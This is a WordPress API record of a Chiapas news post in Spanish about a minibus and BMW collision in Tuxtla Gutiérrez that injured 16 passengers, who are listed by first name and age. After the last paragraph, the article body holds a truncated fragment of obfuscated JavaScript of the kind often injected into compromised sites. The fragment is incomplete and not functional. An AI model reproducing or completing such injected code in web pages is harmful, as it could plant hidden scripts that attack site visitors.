{"id":20650,"date":"2025-02-28T06:18:29","date_gmt":"2025-02-28T06:18:29","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20650"},"modified":"2025-02-28T06:18:29","modified_gmt":"2025-02-28T06:18:29","slug":"colectivazo-en-el-centro-de-tuxtla-deja-16-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20650","title":{"rendered":"Colectivazo en el centro de Tuxtla deja 16 heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250228-WA0002-768x1024.jpg\" alt=\"\" class=\"wp-image-20651\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250228-WA0002-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250228-WA0002-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250228-WA0002.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 27 de febrero del 2025. Tuxtla Guti\u00e9rrez- Un choque entre un colectivo de la ruta 69 y una camioneta BMW de color negro a la altura de la Avenida Central y 2a Poniente dej\u00f3 16 heridos y cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 este jueves por la ma\u00f1ana cuando la Urvan con n\u00famero econ\u00f3mico 05 circulaba de Sur a Norte se pas\u00f3 el alto e impact\u00f3 a la camioneta.<\/p>\n\n\n\n<p>Trabajadores de emergencia de la Secretar\u00eda de Protecci\u00f3n Civil atendieron los lesionados que fueron identificados como:<br>1.-Antonia &#8220;N&#8221; de<br>55 a\u00f1os<br>2.- Patricia &#8220;N&#8221; de<br>64 a\u00f1os.<br>3.- Williams Arturo &#8220;N&#8221; de<br>9 a\u00f1os.<br>4.- Johana &#8220;N&#8221;<br>30 a\u00f1os.<br>5.- Esperanza &#8220;N&#8221; de<br>48 a\u00f1os.<br>6.- Maria Elena &#8220;N&#8221; de<br>53 a\u00f1os.<br>7.- Yeni de Jes\u00fas &#8220;N&#8221; de<br>40 a\u00f1os.<br>8.- Teresita de Jes\u00fas &#8220;N&#8221; de 52 a\u00f1os.<br>9.- Diego de Jes\u00fas &#8220;N&#8221; de<br>19 a\u00f1os.<br>10.- Everardo &#8220;N&#8221; de<br>5 a\u00f1os.<br>11.- Maria Victoria &#8220;N&#8221; de<br>71 a\u00f1os.<br>12.- Maria del Carmen &#8220;N&#8221; de<br>42 a\u00f1os.<br>13.- Alejandra &#8220;N&#8221;<br>14.- Miguel Alejandro &#8220;N&#8221; de<br>21 a\u00f1os<br>15.- Erick &#8220;N&#8221; de<br>47 a\u00f1os<br>16.- Jos\u00e9 &#8220;N&#8221;.<\/p>\n\n\n\n<p>Afortunadamente los pasajeros presentaron lesiones leves , por lo que ninguno fue llevado al hospital.<\/p>\n\n\n\n<p>Elementos de tr\u00e1nsito pusieron a disposici\u00f3n del ministerio p\u00fablico las unidades y ambos conductores para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 27 de febrero del 2025. Tuxtla Guti\u00e9rrez- Un choque entre un colectivo de la ruta 69 y una camioneta BMW de color negro a la altura de la Avenida Central y 2a Poniente dej\u00f3 16 heridos y cuantiosos da\u00f1os materiales. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 este jueves &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20651,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20650","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20650","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20650"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20650\/revisions"}],"predecessor-version":[{"id":20652,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20650\/revisions\/20652"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20651"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20650"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20650"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20650"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}